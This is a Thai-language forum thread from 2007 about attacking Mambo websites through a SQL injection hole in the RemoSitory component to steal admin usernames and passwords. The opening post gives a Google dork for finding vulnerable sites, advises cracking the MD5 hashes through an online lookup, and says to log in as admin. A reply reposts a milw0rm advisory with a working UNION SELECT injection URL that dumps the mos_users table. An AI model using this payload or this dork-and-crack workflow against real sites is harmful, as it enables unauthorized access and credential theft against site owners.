PDA

View Full Version : การ hack Mambo เพื่อขโมย username/password


tonynuc
24-08-2007, 04:42 PM
ช่องโหว่ใหม่ล่าสุดของ Mambo Component RemoSitory (cat) ที่สามารถดู username/password ของ Mambo ได้

1) วิธีหา host ที่มีช่องโหว่

http://www.google.co.th/search?q=inurl:fu...tart=0&sa=N (http://www.google.co.th/search?q=inurl:func%3Dselectcat+%2B+com_remository&hl=th&start=0&sa=N)

2) วิธีการโจมตี

**Hidden Content: Check the thread to see hidden data.**

TARGET=ชื่อ website ที่มีช่องโหว่

3) ตัวอย่างการโจมตีจริง

**Hidden Content: Check the thread to see hidden data.**

4) password ที่ได้มาจะถูก hash ด้วย MD5

ให้นำ hash ที่ได้ไปลอง search database ดูได้ที่

http://www.tmto.org/?category=main&page=search_md5

จะได้ password จริงของ admin มา ลองดูเองนะ ว่าได้อะไร (แต่ห้ามไปลองใช้นะ...)

5) วิธีการ Login ถ้าคนเคยใช้ Mambo จะรู้ว่าหน้า Login อยู่ที่ไหน ไม่รู้ลอง google ดู

Have fun
0x90
tonynuc
dexdee_04
25-08-2007, 07:24 AM
ขอวิธีทำอย่างละเอียดหน่อยครับ ยังไม่เข้าใจครับ ยังไงก็ขอบคุณล่วงหน้าและกันครับ
owenx12
25-08-2007, 02:05 PM
อธิบายยังไม่ค่อยระเอียด ขอละเอียดนิดนึงครับ
ยังไงก้อขอบคุณสำหรับสิ่งดีๆ
neo2600
25-08-2007, 04:30 PM
สุดยอดมากๆครับ ขอบคุณมากๆเลย เมื่อนำมาผนวกกับ google ทำให้เราเห็นอะไรเย๊ะมากครับ จะได้ไปหาทางปิดเว็บป๋มก่อน
sodazt
26-08-2007, 10:40 AM
http://TARGET/index.php?option=com_remosit...m%20mos_users/* <<<<ใครเปิดลิ้งค์นี้ได้้ครับ ผมเปิดไม่ได้นะครับ แก้ไขให้ที
kenchiro75
26-08-2007, 10:54 AM
*******************************************************************************
# Title : Mambo Component RemoSitory (cat) Remote SQL Injection Vulnerability
# Author : ajann
# Contact : :(
# S.Page : http://www.remository.com/
# $$ : Free
# Dork : inurl:func=selectcat + com_remository // Result:43.400
# DorkEx : http://www.google.com.tr/search?q=inurl:fu...tart=0&sa=N (http://www.google.com.tr/search?q=inurl:func%3Dselectcat+%2B+com_remository&hl=tr&start=0&sa=N)

*******************************************************************************

[<div class='sqltop'>SQL</div><div class='sqlmain'>]]---------------------------------------------------------

http://[target]/[path]///index.php?option=com_remository&func=selectcat&cat=[SQL]

Example:

//index.php?option=com_remository&func=selectcat&cat=64549999%20union%20select%201,concat(char(117,115,101,114,110,97,109,101,58),username,char(32,112,97,115,115,119,111,114,100,58),password),0,0,0%20from%20mos_users/*

[ </div>]

"""""""""""""""""""""
# ajann,Turkey
# ...

# Im not Hacker!

# milw0rm.com [2007-08-23]
ruknaja007
29-08-2007, 05:34 PM
ขอบคุณมากๆเลยครับตือว่าพอดีผมกำลังเรียนอยู่พอดีครับ และผมก็กำลังมีปัญหา คือผมลืมพาสเวิดครับ พอดีเห็นกระทุ้นี้ โดนใจเลยครับ
ตอนแรกนึกว่าจะได้ลงใหม่แล้วครับ ขอบคุณมากครับ
nakungza
29-08-2007, 09:21 PM
ขอบคุณครับ มันมีประโยนช์ต่อผมมากครับ ผมจะเรียนรู้ไว้ เพื่อจะเอาไปประยุกค์ใช้ได้นะครับ